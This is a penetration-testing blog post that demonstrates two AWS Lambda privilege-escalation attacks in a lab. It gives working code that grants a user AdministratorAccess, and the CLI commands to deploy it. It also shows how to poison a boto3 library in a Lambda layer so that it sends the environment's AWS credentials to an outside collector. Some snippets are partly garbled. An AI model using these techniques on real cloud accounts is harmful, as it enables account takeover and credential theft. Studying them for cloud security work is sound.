
Welcome back! Today it will be all about AWS Lambda! Get yourself a cup of coffee or a nice glass of wine and join me looking into privilege escalation attacks leveraging AWS Lambda.

AWS Lambda

If you just jumped into my series I recommend starting at the beginning:

Let's get started!


I wrote a quick Lambda function (exploit_me) just displaying "Hello World" to make debugging easier and attached the privesc-high-priv-service-role to it to add some action. Furthermore I also created a lowpriv user with 0 privileges to demonstrate exploitation is successful.

def lambda_handler(event, context):
    print("Hello world")


The privesc17 policy only allows access to the following actions:


We are allowed to change the Lambda function code, let's use exploit_me. The following code will attach the AdministratorAccess policy to our lowpriv user. This works due to the high-privileged service role that is attached to the Lambda function.

import boto3
def lambda_handler(event, context):
    client = boto3.client('iam')
    response = client.attach_user_policy(UserName='lowpriv',PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess')
    return response

In order to replace the harmless "Hello World" code with our malicious exploit we have to create a ZIP file and upload the code:


aws lambda --profile privesc17 update-function-code --function-name exploit_me --zip-file fileb:// --region eu-central-1

In a real-world scenario we would need to wait until somebody invokes the Lambda function, in this case we just trigger it ourselves on by clicking on "Test".

Running aws iam --profile lowpriv list-users proves our lowpriv user has now full access to the AWS account.

Alright! That was pretty cool but what if we don't have lambda:UpdateFunctionCode but we have lambda:GetLayerVersion, lambda:PublishLayerVersion and lambda:UpdateFunctionConfiguration? Then we should infect the Lambda Layer! What are Lambda Layers? The guys from Rhino dive into this here:

Check out the AWS documentation:

Are you familiar with DLL hijacking and the Windows DLL search order? If so, the following won't surprise you. If you try to import a python library like boto3, Lambda will search the following locations until it finds it, starting from /var/task.


The Lambda runtime already includes boto3 on /var/runtime/boto3, but that's the 4th position. Using Lambda layers we can get in right before that, using /opt/python. ;-)

Executing the following commands will download the boto3 library that we'll infect:

mkdir python
cd python
pip3 install -t . boto3==1.9.42

Edit boto3/ to insert the following code that will exfiltrate the credentials:

        import os
        from botocore.vendored import requests'',data=dict(os.environ), timeout=1)

Using the following two AWS commands you'll publish the malicious layer version and attach it to the Lambda function.

aws lambda --profile privesc17 publish-layer-version --layer-name backdoor --description "Backdoor" --license-info "MIT" --zip-file "fileb://" --compatible-runtimes python3.7 python3.8 python3.9 --region eu-central-1

aws lambda --profile privesc17 update-function-configuration --function-name exploit_me --layers arn:aws:lambda:eu-central-1:account_number:layer:backdoor:1 --region eu-central-1

Now invoke the function again and you'll receive the AWS credentials on your Burp Collaborator instance. Take over the AWS account!

AWS credentials incoming!

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Robert Kugler

Information security and human rights enthusiast



Robert Kugler


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